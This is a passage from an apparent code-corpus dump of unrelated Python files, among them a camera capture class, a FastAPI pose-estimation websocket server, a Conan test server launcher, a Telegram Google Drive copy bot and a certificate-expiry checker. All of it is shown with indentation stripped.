envs.update(pserver.slave_envs())
fun_submit(nworker, nserver, envs)
if nserver == 0:
rabit.join()
else:
pserver.join()
def start_rabit_tracker(args):
"""Standalone function to start rabit tracker.
Parameters
----------
args: arguments to start the rabit tracker.
"""
envs = {'DMLC_NUM_WORKER' : args.num_workers,
'DMLC_NUM_SERVER' : args.num_servers}
rabit = RabitTracker(hostIP=get_host_ip(args.host_ip), nslave=args.num_workers)
envs.update(rabit.slave_envs())
rabit.start(args.num_workers)
sys.stdout.write('DMLC_TRACKER_ENV_START\n')
# simply write configuration to stdout
for k, v in envs.items():
sys.stdout.write('%s=%s\n' % (k, str(v)))
sys.stdout.write('DMLC_TRACKER_ENV_END\n')
sys.stdout.flush()
rabit.join()
def main():
"""Main function if tracker is executed in standalone mode."""
parser = argparse.ArgumentParser(description='Rabit Tracker start.')
parser.add_argument('--num-workers', required=True, type=int,
help='Number of worker proccess to be launched.')
parser.add_argument('--num-servers', default=0, type=int,
help='Number of server process to be launched. Only used in PS jobs.')
parser.add_argument('--host-ip', default=None, type=str,
help=('Host IP addressed, this is only needed ' +
'if the host IP cannot be automatically guessed.'))
parser.add_argument('--log-level', default='INFO', type=str,
choices=['INFO', 'DEBUG'],
help='Logging level of the logger.')
args = parser.parse_args()
fmt = '%(asctime)s %(levelname)s %(message)s'
if args.log_level == 'INFO':
level = logging.INFO
elif args.log_level == 'DEBUG':
level = logging.DEBUG
else:
raise RuntimeError("Unknown logging level %s" % args.log_level)
logging.basicConfig(format=fmt, level=level)
if args.num_servers == 0:
start_rabit_tracker(args)
else:
raise RuntimeError("Do not yet support start ps tracker in standalone mode.")
if __name__ == "__main__":
main()
|
camera.py
|
"""camera.py
This code implements the Camera class, which encapsulates code to
handle IP CAM, USB webcam or the Jetson onboard camera. In
addition, this Camera class is further extended to take a video
file or an image file as input.
"""
import logging
import threading
import subprocess
import numpy as np
import cv2
# The following flag ise used to control whether to use a GStreamer
# pipeline to open USB webcam source. If set to False, we just open
# the webcam using cv2.VideoCapture(index) machinery. i.e. relying
# on cv2's built-in function to capture images from the webcam.
USB_GSTREAMER = True
def add_camera_args(parser):
"""Add parser augument for camera options."""
parser.add_argument('--file', dest='use_file',
help='use a video file as input (remember to '
'also set --filename)',
action='store_true')
parser.add_argument('--image', dest='use_image',
help='use an image file as input (remember to '
'also set --filename)',
action='store_true')
parser.add_argument('--filename', dest='filename',
help='video file name, e.g. test.mp4',
default=None, type=str)
parser.add_argument('--rtsp', dest='use_rtsp',
help='use IP CAM (remember to also set --uri)',
action='store_true')
parser.add_argument('--uri', dest='rtsp_uri',
help='RTSP URI, e.g. rtsp://192.168.1.64:554',
default=None, type=str)
parser.add_argument('--latency', dest='rtsp_latency',
help='latency in ms for RTSP [200]',
default=200, type=int)
parser.add_argument('--usb', dest='use_usb',
help='use USB webcam (remember to also set --vid)',
action='store_true')
parser.add_argument('--vid', dest='video_dev',
help='device # of USB webcam (/dev/video?) [0]',
default=0, type=int)
parser.add_argument('--width', dest='image_width',
help='image width [640]',
default=640, type=int)
parser.add_argument('--height', dest='image_height',
help='image height [480]',
default=480, type=int)
return parser
def open_cam_rtsp(uri, width, height, latency):
"""Open an RTSP URI (IP CAM)."""
gst_elements = str(subprocess.check_output('gst-inspect-1.0'))
if 'omxh264dec' in gst_elements:
# Use hardware H.264 decoder on Jetson platforms
gst_str = ('rtspsrc location={} latency={} ! '
'rtph264depay ! h264parse ! omxh264dec ! '
'nvvidconv ! '
'video/x-raw, width=(int){}, height=(int){}, '
'format=(string)BGRx ! videoconvert ! '
'appsink').format(uri, latency, width, height)
elif 'avdec_h264' in gst_elements:
# Otherwise try to use the software decoder 'avdec_h264'
# NOTE: in case resizing images is necessary, try adding
# a 'videoscale' into the pipeline
gst_str = ('rtspsrc location={} latency={} ! '
'rtph264depay ! h264parse ! avdec_h264 ! '
'videoconvert ! appsink').format(uri, latency)
else:
raise RuntimeError('H.264 decoder not found!')
return cv2.VideoCapture(gst_str, cv2.CAP_GSTREAMER)
def open_cam_usb(dev, width, height):
"""Open a USB webcam."""
if USB_GSTREAMER:
gst_str = ('v4l2src device=/dev/video{} ! '
'video/x-raw, width=(int){}, height=(int){} ! '
'videoconvert ! appsink').format(dev, width, height)
return cv2.VideoCapture(gst_str, cv2.CAP_GSTREAMER)
else:
return cv2.VideoCapture(dev)
def open_cam_onboard(width, height):
"""Open the Jetson onboard camera."""
gst_elements = str(subprocess.check_output('gst-inspect-1.0'))
if 'nvcamerasrc' in gst_elements:
# On versions of L4T prior to 28.1, you might need to add
# 'flip-method=2' into gst_str below.
gst_str = ('nvcamerasrc ! '
'video/x-raw(memory:NVMM), '
'width=(int)2592, height=(int)1458, '
'format=(string)I420, framerate=(fraction)30/1 ! '
'nvvidconv ! '
'video/x-raw, width=(int){}, height=(int){}, '
'format=(string)BGRx ! '
'videoconvert ! appsink').format(width, height)
elif 'nvarguscamerasrc' in gst_elements:
gst_str = ('nvarguscamerasrc ! '
'video/x-raw(memory:NVMM), '
'width=(int)1920, height=(int)1080, '
'format=(string)NV12, framerate=(fraction)30/1 ! '
'nvvidconv flip-method=2 ! '
'video/x-raw, width=(int){}, height=(int){}, '
'format=(string)BGRx ! '
'videoconvert ! appsink').format(width, height)
else:
raise RuntimeError('onboard camera source not found!')
return cv2.VideoCapture(gst_str, cv2.CAP_GSTREAMER)
def grab_img(cam):
"""This 'grab_img' function is designed to be run in the sub-thread.
Once started, this thread continues to grab a new image and put it
into the global 'img_handle', until 'thread_running' is set to False.
"""
while cam.thread_running:
_, cam.img_handle = cam.cap.read()
if cam.img_handle is None:
logging.warning('grab_img(): cap.read() returns None...')
break
cam.thread_running = False
class Camera():
"""Camera class which supports reading images from theses video sources:
1. Video file
2. Image (jpg, png, etc.) file, repeating indefinitely
3. RTSP (IP CAM)
4. USB webcam
5. Jetson onboard camera
"""
def __init__(self, args):
self.args = args
self.is_opened = False
self.use_thread = False
self.thread_running = False
self.img_handle = None
self.img_width = 0
self.img_height = 0
self.cap = None
self.thread = None
def open(self):
"""Open camera based on command line arguments."""
assert self.cap is None, 'Camera is already opened!'
args = self.args
if args.use_file:
self.cap = cv2.VideoCapture(args.filename)
# ignore image width/height settings here
self.use_thread = False
elif args.use_image:
self.cap = 'OK'
self.img_handle = cv2.imread(args.filename)
# ignore image width/height settings here
if self.img_handle is not None:
self.is_opened = True
self.img_height, self.img_width, _ = self.img_handle.shape
self.use_thread = False
elif args.use_rtsp:
self.cap = open_cam_rtsp(
args.rtsp_uri,
args.image_width,
args.image_height,
args.rtsp_latency
)
self.use_thread = True
elif args.use_usb:
self.cap = open_cam_usb(
args.video_dev,
args.image_width,
args.image_height
)
self.use_thread = True
else: # by default, use the jetson onboard camera
self.cap = open_cam_onboard(
args.image_width,
args.image_height
)
self.use_thread = True
if self.cap != 'OK':
if self.cap.isOpened():
# Try to grab the 1st image and determine width and height
_, img = self.cap.read()
if img is not None:
self.img_height, self.img_width, _ = img.shape
self.is_opened = True
def start(self):
assert not self.thread_running
if self.use_thread:
self.thread_running = True
self.thread = threading.Thread(target=grab_img, args=(self,))
self.thread.start()
def stop(self):
self.thread_running = False
if self.use_thread:
self.thread.join()
def read(self):
if self.args.use_file:
_, img = self.cap.read()
if img is None:
#logging.warning('grab_img(): cap.read() returns None...')
# looping around
self.cap.release()
self.cap = cv2.VideoCapture(self.args.filename)
_, img = self.cap.read()
return img
elif self.args.use_image:
return np.copy(self.img_handle)
else:
return self.img_handle
def release(self):
assert not self.thread_running
if self.cap != 'OK':
self.cap.release()
|
main.py
|
from collections import defaultdict
from getpass import getuser
from fastapi import FastAPI, WebSocket
from pyparsing import And
import uvicorn
import poseEstimation
import mediapipe as mp
import calculator as calc
import time, threading, queue
import datetime as dt
import json
app = FastAPI(title='ESMA API')
mpPose = mp.solutions.pose
class connectionUser:
def __init__(self, id, pose):
self.id = id
self.currFrame = None
self.pose = pose
self.currExercise = None
self.features = defaultdict(int)
self.hasBeenUp = False
self.queue = []
self.prediction = []
id: str
pose:any
currFrame: str
currExercise: str
features: dict()
hasBeenUp: bool
queue: list
prediction:any
connections = []
def startTime(connection):
queueThread = threading.Thread(target=updateQueue, args=(connection,))
queueThread.daemon = True
queueThread.start()
checkQueueThread = threading.Thread(target=updateFrames, args=(connection,))
checkQueueThread.daemon = True
checkQueueThread.start()
def updateQueue(connection):
starttimes = time.time()
while True:
connection.queue.append(connection)
time.sleep(0.04166 - ((time.time() - starttimes) % 0.04166))
def updateFrames(connection):
while True:
if(connection.queue):
poseEstimation.receivedFrameData(connection.queue[0])
connection.queue.pop(0)
def updateConnection (clientData):
user = next(x for x in connections if x.id == clientData["id"])
if(user):
user.currFrame = clientData["frame"]
user.currExercise = clientData["exerciseType"]
def getUser (id):
return next(x for x in connections if x.id == id)
@app.websocket("/ws")
async def websocket_endpoint(websocket: WebSocket):
await websocket.accept()
while True:
try:
data = await websocket.receive_json()
if(data["type"] == "init"):
connections.append(connectionUser(data["id"], mpPose.Pose()))
connection = getUser(data["id"]);
thread = threading.Thread(target=startTime, args=(connection,))
thread.daemon = True
thread.start()
else:
updateConnection(data)
user = getUser(data["id"])
if(user.prediction):
if(user.prediction[0] > 0.9):
await websocket.send_text("correct")
print("correct ", user.prediction[0])
else:
await websocket.send_text("incorrect")
print("incorrect ", user.prediction[0])
#print(json.dumps(user.prediction))
user.prediction = []
except Exception as e:
print("error: ", e)
break
if __name__ == "__main__":
uvicorn.run(app, host="0.0.0.0", port=5000)
|
server_launcher.py
|
#!/usr/bin/python
from conans.server.service.authorize import BasicAuthorizer, BasicAuthenticator
import os
from conans.server.conf import get_file_manager
from conans.server.rest.server import ConanServer
from conans.server.crypto.jwt.jwt_credentials_manager import JWTCredentialsManager
from conans.server.crypto.jwt.jwt_updown_manager import JWTUpDownAuthManager
from conans.util.log import logger
from conans.util.files import mkdir
from conans.test.utils.test_files import temp_folder
from conans.server.migrate import migrate_and_get_server_config
from conans.search.search import DiskSearchAdapter, DiskSearchManager
from conans.paths import SimplePaths
import time
import shutil
from conans import SERVER_CAPABILITIES
TESTING_REMOTE_PRIVATE_USER = "private_user"
TESTING_REMOTE_PRIVATE_PASS = "private_pass"
class TestServerLauncher(object):
port = 0
def __init__(self, base_path=None, read_permissions=None,
write_permissions=None, users=None, base_url=None, plugins=None,
server_version=None,
min_client_compatible_version=None,
server_capabilities=None):
plugins = plugins or []
if not base_path:
base_path = temp_folder()
if server_capabilities is None:
server_capabilities = SERVER_CAPABILITIES # Default enabled
if not os.path.exists(base_path):
raise Exception("Base path not exist! %s")
# Define storage_folder, if not, it will be readed from conf file and pointed to real user home
self.storage_folder = os.path.join(base_path, ".conan_server", "data")
mkdir(self.storage_folder)
server_config = migrate_and_get_server_config(base_path, self.storage_folder)
if TestServerLauncher.port == 0:
TestServerLauncher.port = server_config.port
# Encode and Decode signature for Upload and Download service
updown_auth_manager = JWTUpDownAuthManager(server_config.updown_secret,
server_config.authorize_timeout)
self.file_manager = get_file_manager(server_config, public_url=base_url,
updown_auth_manager=updown_auth_manager)
search_adapter = DiskSearchAdapter()
self.search_manager = DiskSearchManager(SimplePaths(server_config.disk_storage_path), search_adapter)
# Prepare some test users
if not read_permissions:
read_permissions = server_config.read_permissions
read_permissions.append(("private_library/1.0.0@private_user/testing", "*"))
read_permissions.append(("*/*@*/*", "*"))
if not write_permissions:
write_permissions = server_config.write_permissions
if not users:
users = dict(server_config.users)
users[TESTING_REMOTE_PRIVATE_USER] = TESTING_REMOTE_PRIVATE_PASS
authorizer = BasicAuthorizer(read_permissions, write_permissions)
authenticator = BasicAuthenticator(users)
credentials_manager = JWTCredentialsManager(server_config.jwt_secret,
server_config.jwt_expire_time)
logger.debug("Storage path: %s" % self.storage_folder)
self.port = TestServerLauncher.port
self.ra = ConanServer(self.port, credentials_manager, updown_auth_manager,
authorizer, authenticator, self.file_manager, self.search_manager,
server_version, min_client_compatible_version,
server_capabilities)
for plugin in plugins:
self.ra.api_v1.install(plugin)
def start(self, daemon=True):
"""from multiprocessing import Process
self.p1 = Process(target=ra.run, kwargs={"host": "0.0.0.0"})
self.p1.start()
self.p1"""
import threading
class StoppableThread(threading.Thread):
"""Thread class with a stop() method. The thread itself has to check
regularly for the stopped() condition."""
def __init__(self, *args, **kwargs):
super(StoppableThread, self).__init__(*args, **kwargs)
self._stop = threading.Event()
def stop(self):
self._stop.set()
def stopped(self):
return self._stop.isSet()
self.t1 = StoppableThread(target=self.ra.run, kwargs={"host": "0.0.0.0", "quiet": True})
self.t1.daemon = daemon
self.t1.start()
time.sleep(1)
def stop(self):
self.ra.root_app.close()
self.t1.stop()
def clean(self):
if os.path.exists(self.storage_folder):
try:
shutil.rmtree(self.storage_folder)
except:
print("Can't clean the test server data, probably a server process is still opened")
if __name__ == "__main__":
server = TestServerLauncher()
server.start(daemon=False)
|
set_proxy.py
|
from PyQt5.QtWidgets import QDialog, QApplication
from PyQt5.uic import loadUi
from PyQt5.QtCore import pyqtSlot, Qt, pyqtSignal
import sys
import urllib.request
import urllib.error
import urllib.parse
import threading
class SetProxies(QDialog):
signal_update = pyqtSignal(str)
proxy_selected = pyqtSignal(str)
def __init__(self):
super().__init__()
loadUi('set_proxy.ui', self)
self.setWindowFlags(Qt.WindowMaximizeButtonHint | Qt.WindowMinimizeButtonHint | Qt.WindowMinimizeButtonHint)
self.signal_update.connect(self.update_proxies_status)
self.active_proxies = []
self.selected_proxy = None
self.check_proxies_thread = None
self.proxies_checked = False
def update_proxies_status(self, message):
self.logList.addItem(message)
def on_proxiesList_itemClicked(self, item):
if self.proxies_checked:
ip = item.text()
if ip in self.active_proxies:
self.selected_proxy_label.setText(f'{ip} selected')
self.confirmButton.setEnabled(True)
self.selected_proxy = ip
else:
self.selected_proxy_label.setText(f'{ip} is broken, please select a working one')
self.confirmButton.setEnabled(False)
self.selected_proxy = None
@pyqtSlot()
def on_addButton_clicked(self):
self.proxiesList.addItem('0.0.0.0:0000')
self.proxiesList.setCurrentRow(self.proxiesList.count()-1)
self.proxiesList.currentItem().setFlags(Qt.ItemIsSelectable | Qt.ItemIsEditable |
Qt.ItemIsUserCheckable | Qt.ItemIsEnabled | Qt.ItemIsDragEnabled)
@pyqtSlot()
def on_removeButton_clicked(self):
self.proxiesList.takeItem(self.proxiesList.currentRow())
@pyqtSlot()
def on_confirmButton_clicked(self):
self.proxy_selected.emit(self.selected_proxy)
self.reject()
@pyqtSlot()
def on_checkproxiesButton_clicked(self):
# a thread could only be started once, so we need to construct a new one every time
self.check_proxies_thread = threading.Thread(target=self.check_proxies)
self.check_proxies_thread.start()
def check_proxies(self):
self.logList.clear()
self.mousePressEvent(None)
for i in range(self.proxiesList.count()):
ip = self.proxiesList.item(i).text()
try:
# check if proxy can connect to "https" site
proxy_handler = urllib.request.ProxyHandler({'https': ip})
opener = urllib.request.build_opener(proxy_handler)
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
urllib.request.install_opener(opener)
req = urllib.request.Request('https://www.google.com')
# set timeout to 5 (proxy will be classified to BAD if it can't open google in 5 sec)
with urllib.request.urlopen(req, timeout=5):
self.signal_update.emit(f'\u2713: {ip} is working')
self.active_proxies.append(ip)
except Exception as detail:
self.signal_update.emit(f'\u2717: {ip} crashed, {detail}')
self.proxies_checked = True
def mousePressEvent(self, event):
if QApplication.focusWidget():
QApplication.focusWidget().clearFocus()
if __name__ == '__main__':
app = QApplication(sys.argv)
window = SetProxies()
window.show()
sys.exit(app.exec_())
|
main.py
|
from datetime import datetime
from http.server import BaseHTTPRequestHandler
from http.server import HTTPServer
from threading import Event
from threading import Thread
from time import sleep
from analysis import Analysis
from logs import Logs
from trading import Trading
from twitter import Twitter
# Whether to send all logs to the cloud instead of a local file.
LOGS_TO_CLOUD = True
# The duration of the smallest backoff step in seconds.
BACKOFF_STEP_S = 0.1
# The maximum number of retry steps, equivalent to 0.1 * (2^12 - 1) = 409.5
# seconds of total delay. This is the largest interval that one backoff
# sequence may take.
MAX_TRIES = 12
# The time in seconds after which to reset a backoff sequence. This is the
# smallest interval at which backoff sequences may repeat normally.
BACKOFF_RESET_S = 30 * 60
# The host for the monitor Web server.
MONITOR_HOST = '0.0.0.0'
# The port for the monitor Web server.
# MONITOR_PORT = 80
MONITOR_PORT = 1042
# The message returned by the monitor Web server.
MONITOR_MESSAGE = 'OK'
class Monitor:
"""A monitor exposing a Web server while the main loop is running."""
def __init__(self):
"""Creates a Web server on a background thread."""
self.server = HTTPServer((MONITOR_HOST, MONITOR_PORT),
self.MonitorHandler)
self.thread = Thread(target=self.server.serve_forever)
self.thread.daemon = True
def start(self):
"""Starts the Web server background thread."""
self.thread.start()
def stop(self):
"""Stops the Web server and background thread."""
self.server.shutdown()
self.server.server_close()
class MonitorHandler(BaseHTTPRequestHandler):
"""An HTTP request handler that responds with "OK" while running."""
def _set_headers(self):
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.end_headers()
def do_GET(self):
self._set_headers()
self.wfile.write(MONITOR_MESSAGE.encode('utf-8'))
def do_HEAD(self):
self._set_headers()
class Main:
"""A wrapper for the main application logic and retry loop."""
def __init__(self):
self.logs = Logs(name='main', to_cloud=LOGS_TO_CLOUD)
self.twitter = Twitter(logs_to_cloud=LOGS_TO_CLOUD)
def twitter_callback(self, tweet):
"""Analyzes Trump tweets, trades stocks, and tweets about it."""
# Initialize the Analysis, Logs, Trading, and Twitter instances inside
# the callback to create separate httplib2 instances per thread.
analysis = Analysis(logs_to_cloud=LOGS_TO_CLOUD)
logs = Logs(name='main-callback', to_cloud=LOGS_TO_CLOUD)
# Analyze the tweet.
companies = analysis.find_companies(tweet)
logs.info('Using companies: %s' % companies)
if not companies:
return
# Trade stocks.
# trading = Trading(logs_to_cloud=LOGS_TO_CLOUD)
# trading.make_trades(companies)
# Tweet about it.
twitter = Twitter(logs_to_cloud=LOGS_TO_CLOUD)
twitter.tweet(companies, tweet)
def run_session(self):
"""Runs a single streaming session. Logs and cleans up after
exceptions.
"""
self.logs.info('Starting new session.')
try:
self.twitter.start_streaming(self.twitter_callback)
except:
self.logs.catch()
finally:
self.twitter.stop_streaming()
self.logs.info('Ending session.')
def backoff(self, tries):
"""Sleeps an exponential number of seconds based on the number of
tries.
"""
delay = BACKOFF_STEP_S * pow(2, tries)
self.logs.warn('Waiting for %.1f seconds.' % delay)
sleep(delay)
def run(self):
"""Runs the main retry loop with exponential backoff."""
tries = 0
while True:
# The session blocks until an error occurs.
self.run_session()
# Remember the first time a backoff sequence starts.
now = datetime.now()
if tries == 0:
self.logs.debug('Starting first backoff sequence.')
backoff_start = now
# Reset the backoff sequence if the last error was long ago.
if (now - backoff_start).total_seconds() > BACKOFF_RESET_S:
self.logs.debug('Starting new backoff sequence.')
tries = 0
backoff_start = now
# Give up after the maximum number of tries.
if tries >= MAX_TRIES:
self.logs.warn('Exceeded maximum retry count.')
break
# Wait according to the progression of the backoff sequence.
self.backoff(tries)
# Increment the number of tries for the next error.
tries += 1
if __name__ == '__main__':
monitor = Monitor()
monitor.start()
try:
Main().run()
finally:
monitor.stop()
|
iCopy.py
|
import time, logging, re, chardet
from telegram.ext import (
Updater,
CommandHandler,
MessageHandler,
Filters,
CallbackQueryHandler,
ConversationHandler,
)
from telegram.ext.dispatcher import run_async
import utils
from utils import (
folder_name,
sendmsg,
restricted,
menu_keyboard,
run,
start_message,
help_message,
mode_message,
task_message,
cplt_message,
pros_message,
cron_task,
killmission,
kill_message,
Mission_Done,
Mission_kill,
kill_message_info
)
from drive import drive_get
from threading import Timer, Thread
import settings
from process_bar import status
# ############################## Program Description ##############################
# Latest Modified DateTime : 202006271300 ,
# Version = '0.1.6',
# Author : 'FxxkrLab',
# Website: 'https://bbs.jsu.net/c/official-project/icopy/6',
# Code_URL : 'https://github.com/fxxkrlab/iCopy',
# Description= 'Copy GoogleDrive Resources via Telegram BOT',
# Programming Language : Python3',
# License : MIT License',
# Operating System : Linux',
# ############################## Program Description.END ###########################
# ############################## logging ##############################
# Logging.basicConfig()
logging.basicConfig(
format="%(asctime)s - %(name)s - %(levelname)s - %(message)s", level=logging.INFO,
)
logger = logging.getLogger(__name__)
# ############################## Global ##############################
# Conversation Stats
CHOOSE_MODE, LINK_REPLY, TARGET_REPLY = range(3)
# Regex
regex = r"[-\w]{11,}"
# ############################## Command ##############################
# START INFO & InlineKeyboard with Callback_query.data
@restricted
def start(update, context):
update.effective_message.reply_text(
start_message().format(update.effective_user.first_name),
reply_markup=menu_keyboard(),
)
return CHOOSE_MODE
# HELP 帮助命令提示引导
@restricted
def help(update, context):
update.effective_message.reply_text(help_message())
# ############################## Run_Modes ##############################
# QUICK Mode ,set mode = quick
@restricted
def quick(update, context):
global mode
mode = "quick"
call_mode = update.effective_message.text
if "/quick" == call_mode.strip()[:6]:
update.effective_message.reply_text(
mode_message().format(update.effective_user.first_name, "┋极速转存┋")
)
return request_link(update, context)
if update.callback_query.data == "quick":
update.callback_query.edit_message_text(
mode_message().format(update.effective_user.first_name, "┋极速转存┋")
)
return request_link(update, context)
# COPY Mode ,set mode = copy
@restricted
def copy(update, context):
global mode
mode = "copy"
call_mode = update.effective_message.text
if "/copy" == call_mode.strip()[:5]:
update.effective_message.reply_text(
mode_message().format(update.effective_user.first_name, "┋自定义目录┋")
)
return request_link(update, context)
if update.callback_query.data == "copy":
update.callback_query.edit_message_text(
mode_message().format(update.effective_user.first_name, "┋自定义目录┋")
)
return request_link(update, context)
# ############################## Run_Modes.END ##############################
# Error module
def error(update, context):
"""Log Errors caused by Updates."""
logger.warning('Update "%s" caused error "%s"', update, context.error)
# cancel function
def cancel(update, context):
user = update.message.from_user
logger.info("User %s canceled the conversation.", user.first_name)
update.message.reply_text(
"Bye! {} , 欢迎再次使用 iCopy".format(update.message.from_user.first_name)
)
return ConversationHandler.END
# kill function
def kill(update, context):
Thread(target=killmission).start()
return cancel(update, context)
# ################################ Service #################################
# Request GoogleDrive Shared_Link
def request_link(update, context):
update.effective_message.reply_text("请输入 Google Drive 分享链接")
return LINK_REPLY
# Get Shared_link & request Target_Link
def request_target(update, context):
global mode
global link
link = update.effective_message.text
if "/cancel" == link.strip()[:7]:
return cancel(update, context)
if "quick" == mode:
return recived_mission(update, context)
if "copy" == mode:
update.effective_message.reply_text("请输入转入目标文件夹链接 ")
return TARGET_REPLY
# Get Target_Link(also include Shared_link) & run command judged from mode
def recived_mission(update, context):
global mode
global link
global target
target = update.effective_message.text
if "/cancel" == target.strip()[:7]:
return cancel(update, context)
# extract lid,tid from Link(shared & Target)
lid = "".join(re.findall(regex, link))
tid = "".join(re.findall(regex, target))
# extract Shared_Link folderName
if len(lid) == 28 or len(lid) == 33:
foldername = folder_name(settings.Remote, lid, lid)
elif len(lid) != 28 and len(lid) != 33:
d_id = lid
foldername = drive_get(d_id)['name']
# get Target_folderName under quick mode
if "quick" == mode:
# tid = Pre_Dst_id under quick mode
tid = settings.Pre_Dst_id
if len(tid) == 28 or len(tid) == 33:
target_folder = folder_name(settings.Remote, tid, tid)
elif len(tid) != 28 and len(tid) != 33:
d_id = tid
target_folder = drive_get(d_id)['name']
# get Target_folderName under copy mode
elif "copy" == mode:
if len(tid) == 28 or len(tid) == 33:
target_folder = folder_name(settings.Remote, tid, tid)
elif len(tid) != 28 and len(tid) != 33:
d_id = tid
target_folder = drive_get(d_id)['name']
# sendmsg Mission.INFO
update.effective_message.reply_text(
task_message().format(foldername, lid, target_folder, foldername)
)
# Build Mission Command
commandstr = """{}' JSUSPLIT 'copy' JSUSPLIT '{}:{{{}}}' JSUSPLIT '{}:{{{}}}/{}' JSUSPLIT '{}' JSUSPLIT '{}""".format(
settings.Clone,
settings.Remote,
lid,
settings.Remote,
tid,
foldername,
settings.Run_Mode,
settings.TRANSFER,
)
command = commandstr.split("' JSUSPLIT '")
#print(command)
return ConversationHandler.END, copyprocess(update, context, command)
# 任务信息读取处理,并通过异步进程发送 BOT 界面滚动更新信息
@run_async
def copyprocess(update, context, command):
bot = context.bot
message = update.effective_message.reply_text("转存任务准备中...")
mid = message.message_id
percent = ""
percent1 = ""
working = ""
working1 = ""
prog = ""
timeout = 0.1
xtime = 0
for toutput in run(command):
print(toutput.decode("utf-8", "ignore"))
y = re.findall("^Transferred:", toutput.decode("utf-8", "ignore"))
z = re.findall("^ * ", toutput.decode("utf-8", "ignore"))
if y:
val = str(toutput.decode("utf-8", "ignore"))
val = val.split(",")
percent = str(val[1])
statu = val[1].replace("%", "")
if statu != " -":
statu = int(statu)
prog = status(statu)
if z:
working = str(
toutput.decode("utf-8", "ignore").lstrip("* ").rsplit(":", 2)[0]
)
if working1 != working or percent1 != percent:
if int(time.time()) - xtime > timeout:
cron_task(
sendmsg,
bot,
message.chat_id,
mid,
pros_message(),
percent,
prog,
working,
)
percent1 = percent
working1 = working
xtime = time.time()
# Fix Mission INFO
if utils.Mission_Done == "finished":
if utils.Mission_kill != "killed":
percent = "100%"
prog = status(100)
cron_task(
sendmsg, bot, message.chat_id, mid, cplt_message(), percent, prog, ""
)
utils.Mission_Done = ""
return help(update, context)
elif utils.Mission_kill == "killed":
cron_task(
sendmsg,
bot,
message.chat_id,
mid,
kill_message(),
kill_message_info(),
"",
"",
)
utils.Mission_Done = ""
utils.Mission_kill = ""
return help(update, context)
# ############################### Main ####################################
def main():
updater = Updater(settings.TOKEN, use_context=True,)
dp = updater.dispatcher
# Entry Conversation
conv_handler = ConversationHandler(
entry_points=[
# Entry Points
CommandHandler("start", start),
CommandHandler("quick", quick),
CommandHandler("copy", copy),
],
states={
CHOOSE_MODE: [
# call function which judged via pattern
CallbackQueryHandler(quick, pattern="quick"),
CallbackQueryHandler(copy, pattern="copy"),
],
LINK_REPLY: [
# get Shared_Link states
CallbackQueryHandler(request_target),
MessageHandler(Filters.text, request_target),
],
TARGET_REPLY: [
# get Target_Link states
CallbackQueryHandler(recived_mission),
MessageHandler(Filters.text, recived_mission),
],
},
fallbacks=[CommandHandler("cancel", cancel),],
)
dp.add_handler(CommandHandler("kill", kill), 1)
dp.add_handler(conv_handler, 2)
dp.add_handler(CommandHandler("help", help))
dp.add_error_handler(error)
updater.start_polling()
logger.info("Fxxkr LAB iCopy Start")
updater.idle()
if __name__ == "__main__":
main()
|
compare_Wchain_sgd_5layers.py
|
import qiskit
import numpy as np
import sys
sys.path.insert(1, '../')
import qtm.base, qtm.constant, qtm.ansatz, qtm.fubini_study, qtm.encoding
import importlib
import multiprocessing
importlib.reload(qtm.base)
importlib.reload(qtm.constant)
importlib.reload(qtm.ansatz)
importlib.reload(qtm.fubini_study)
def run_wchain(num_layers, num_qubits):
thetas = np.ones(num_layers*num_qubits*4)
psi = 2*np.random.rand(2**num_qubits)-1
psi = psi / np.linalg.norm(psi)
qc = qiskit.QuantumCircuit(num_qubits, num_qubits)
qc.initialize(psi, range(0, num_qubits))
loss_values = []
thetass = []
for i in range(0, 400):
if i % 20 == 0:
print('W_chain: (' + str(num_layers) + ',' + str(num_qubits) + '): ' + str(i))
grad_loss = qtm.base.grad_loss(
qc,
qtm.ansatz.create_Wchain_layerd_state,
thetas, num_layers = num_layers)
thetas -= qtm.constant.learning_rate*(grad_loss)
thetass.append(thetas.copy())
qc_copy = qtm.ansatz.create_Wchain_layerd_state(qc.copy(), thetas, num_layers)
loss = qtm.loss.loss_basis(qtm.base.measure(qc_copy, list(range(qc_copy.num_qubits))))
loss_values.append(loss)
traces = []
fidelities = []
for thetas in thetass:
qc = qiskit.QuantumCircuit(num_qubits, num_qubits)
qc = qtm.ansatz.create_Wchain_layerd_state(qc, thetas, num_layers = num_layers).inverse()
psi_hat = qiskit.quantum_info.Statevector.from_instruction(qc)
# Calculate the metrics
trace, fidelity = qtm.base.get_metrics(psi, psi_hat)
traces.append(trace)
fidelities.append(fidelity)
print('Writting ... ' + str(num_layers) + ' layers,' + str(num_qubits) + ' qubits')
np.savetxt("../../experiments/tomography/tomography_wchain_" + str(num_layers) + "/" + str(num_qubits) + "/loss_values.csv", loss_values, delimiter=",")
np.savetxt("../../experiments/tomography/tomography_wchain_" + str(num_layers) + "/" + str(num_qubits) + "/thetass.csv", thetass, delimiter=",")
np.savetxt("../../experiments/tomography/tomography_wchain_" + str(num_layers) + "/" + str(num_qubits) + "/traces.csv", traces, delimiter=",")
np.savetxt("../../experiments/tomography/tomography_wchain_" + str(num_layers) + "/" + str(num_qubits) + "/fidelities.csv", fidelities, delimiter=",")
if __name__ == "__main__":
# creating thread
num_layers = [5]
num_qubits = [2, 3, 4, 5, 6]
t_wchains = []
for i in num_layers:
for j in num_qubits:
t_wchains.append(multiprocessing.Process(target = run_wchain, args=(i, j)))
for t_wchain in t_wchains:
t_wchain.start()
for t_wchain in t_wchains:
t_wchain.join()
print("Done!")
|
certs.py
|
#!/usr/bin/env python
#
# Generic script to get the days left to expire for https certs
#
import argparse
import datetime
import json
import subprocess
import sys
from threading import Thread
#------------------------------------------------------------------------------
# Group
group = 'HTTPS check'
# Description of metrics
description = 'Check validity of HTTPS certificates'
# Hosts to check
hosts = {
# '{{Name of host}}': {{host}},
# ex 'HTTPS days left - google.be': 'google.be',
'HTTPS days left - google.be': 'google.be',
'HTTPS days left - coscale': 'coscale.com',
'HTTPS days left - microsoft': 'microsoft.com',
}
#------------------------------------------------------------------------------
#
# DONT CHANGE ANYTHING BELOW THIS LINE
#
#------------------------------------------------------------------------------
def execute(metricId, host):
try:
output = subprocess.check_output('echo | openssl s_client -showcerts -servername {0} -connect {1}:443 2>/dev/null | openssl x509 -noout -dates 2>/dev/null'.format(host, host), shell=True)
notAfter = output.split('\n')[1].split('=')[1]
days = (datetime.datetime.strptime(notAfter, '%b %d %H:%M:%S %Y %Z') - datetime.datetime.today()).days
except subprocess.CalledProcessError as e:
days = -1
